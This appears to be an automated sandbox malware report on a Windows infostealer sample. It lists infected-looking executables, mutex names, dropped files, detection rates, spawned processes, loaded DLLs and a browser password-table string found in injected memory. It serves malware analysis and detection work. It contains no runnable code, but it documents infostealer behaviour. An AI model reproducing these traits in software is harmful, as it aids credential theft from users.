            Source: plugin-container.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: private_browsing.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssh-agent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: TieringEngineService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AgentService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ie_to_edge_stub.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: cookie_exporter.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: identity_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wbengine.exe.2.drBinary string: base\stor\blb\catalog\compare.cpprowid1 != rowid2pKey->m_type == pCol->m_typepRow1 > pRow2_hImpersonationToken != INVALID_HANDLE_VALUEbase\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsuCurrentBit < HintSpaceBitmapSizeExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecovery\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\{{3808876B-C176-4e48-B7AE-04046E6CC752}ReplicationContext->FirstBlock != NULLIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGBackupFileName != NULLReplicationHandleReplicationContext != NULLoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSizereadBuffer != NULL\pagefile.sys\hiberfil.sys!IsListEmpty(&diffsInSource)
            Source: wbengine.exe.2.drBinary string: base\stor\blb\engine\blbengutils\Blbvhdhelper.hthis->m_handle == NULL\\?\Globalroot\Device\Harddisk%lu\Partition1\\?\Globalroot\Device\Harddisk%lu\Partition2\\?\Globalroot\Device\HarddiskVolume%luChild_{47b7fa87-ce42-48ff-8b18-2f1088121503}WindowsBackupLinksbase\stor\blb\engine\blbengutils\blbvhdhelper.cppwszVhdFile && *wszVhdFilepwszVolumeDevicePathwszDiskPath && *wszDiskPathpwszVolumePathwszMountedDeviceName && *wszMountedDeviceNamepCBlbVhdwszMountedVolumePathNoSlash && *wszMountedVolumePathNoSlashpVhdContextpVhdContextForRemovalwszVolumeDevicePath && *wszVolumeDevicePathppVhdContextpVhdContext->m_pCBlbVhdsdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_1 || sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_2ppDependencyInfopbIsVolVirtualppStorageDepInfowszTargetVolName && *wszTargetVolNamewszVirtualSrcVolName && *wszVirtualSrcVolNamepbIsVirtualSrcVolDependantpVolumeVHDInfo != NULLpstDepInfo != NULLpstDepInfoType2MaxAncestor != NULLpwszDiffVhdFilePath && pwszVhdTempPath%ws_%ws_%wspProgressReportCallbackContextwszVHDVolumeDevicePathpbCompactionRequiredwszVhdFilepGuidSnapshotIdwszVHDVolumeDevicePath && *wszVHDVolumeDevicePathpdwVHDDeviceDiskNumberpVhdHandle
            Source: wbengine.exe.2.drBinary string: _((HANDLE)(LONG_PTR)-1) != hFilebase\stor\blb\dsm\dsmutils\dll\fsutilswrapper.cppExtractVolumePath(ssPath, ssVolumePath)SplitDirPath( ssDirPath, ssParentDir, ssDirName )GetParentPaths(ssPath, arrstrPaths)ssDirPath.Length() != 0base\stor\blb\dsm\dsmutils\dll\fsutils.cpppstrPath != 0pstrName != 0CLOCK$COMLPTCONPRNAUXNUL\\?\GLOBALROOT\Device\base\stor\blb\dsm\dsmutils\dll\fsutils.cppInvalid path:%lsssPath.Length() > 0GetVolumePrefixLength failed for %lsFailed to parse path:%lsExtractVolumePath(ssWorkingPath, ssVolumePath)ssWorkingPath[ssWorkingPath.Length() - 1] == L'\\'(((HRESULT)(hrReason)) < 0)pstrPath && pstrPath[0]pfIsReparsedppstrReparsePtPath && (*ppstrReparsePtPath == 0)GetFileAttributes() failed on:%lsIsPathMountPoint(ssPath.PeekStr(), &fMountPoint)pszVolumePath != 0phVolume != 0ssVolumePath[ssVolumePath.Length() - 1] == L'\\'Failed to open volume:%ls((HANDLE)(LONG_PTR)-1) == hVolumeppstrPath && *ppstrPath == 0dwPathLength > 0 && pstrFilePath[dwPathLength-1] == L'\\'0 != pdwFileAttributesGetFileInformationByHandle(hFile, &fileInfo)0 != lpstrFilePathCreateFile unsuccessful for %wsFSWrapperGetFileAttributes(hFile, pdwFileAttributes)0 != pFileAttributesGetFileInformationByHandleEx(hFile, FileBasicInfo, &fileInfo, sizeof(FILE_BASIC_INFO))GetFileSize failed for %ws((DWORD)-1) != dwFileAttributesGetFileInformationByHandleEx failedSetFileInformationByHandle failedFSWrapperSetFileAttributes(hFile, dwFileAttributes)SplitDirPath(strPath, strParent, strChild)Path %S is invalid as it contains a '.' or '..', hr=0x%08xHRESULT_FROM_WIN32(GetLastError())wszPath && wszPath[0]pfIsPathMountPoint
            Source: wbengine.exe.2.drBinary string: base\stor\blb\engine\blbengutils\blbvolumeutils.cpppbFloppypguidVolumeId != NULLpbIsCritical != NULLpguidVolumeIdwszMountedDeviceNamewszVolumeGuidpwszReparsePointName\\?\GLOBALROOT\DEVICE\HARDDISKVOLUME%dWsbMountedVolumeFile%lu_%spVolumeCatrgVolumeLocalwszVolumeGuidPathpwszVolumeGlobalRootPathVolume%ws\\?\GLOBALROOT%wspdwlJournalIdplastUsnwszVolumeName && *wszVolumeNamepbPerformResizepdwlUsnSizevssSnapshotId != GUID_NULLdwlJournalId != BLB_INVALID_USN_JOURNAL_IDusnBeforeSnapShot != BLB_INVALID_USN_IDwszBackupSetDirectorypwszVhdPathwszVolumeName != NULLpbIsVolumeOnSharedDisk != NULLpbIsCSVpdwVolumeNumber6
            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@20/162@17/9
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Users\user\AppData\Roaming\ec81b4f2d7d67082.binJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-ec81b4f2d7d6708282f24b2d-b
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-ec81b4f2d7d67082-inf
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-ec81b4f2d7d670829ea72c54-b
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile created: C:\Users\user\AppData\Local\Temp\aut7759.tmpJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RegSvcs.exe, 00000011.00000002.2875384069.000000000362D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002704000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.00000000026E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002718000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.00000000026F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002725000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SABXJ1B5c8.exeVirustotal: Detection: 68%
            Source: SABXJ1B5c8.exeReversingLabs: Detection: 84%
            Source: unknownProcess created: C:\Users\user\Desktop\SABXJ1B5c8.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
            Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
            Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
            Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
            Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
            Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
            Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
            Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"
            Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
            Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
            Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
            Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
            Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
            Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: webio.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
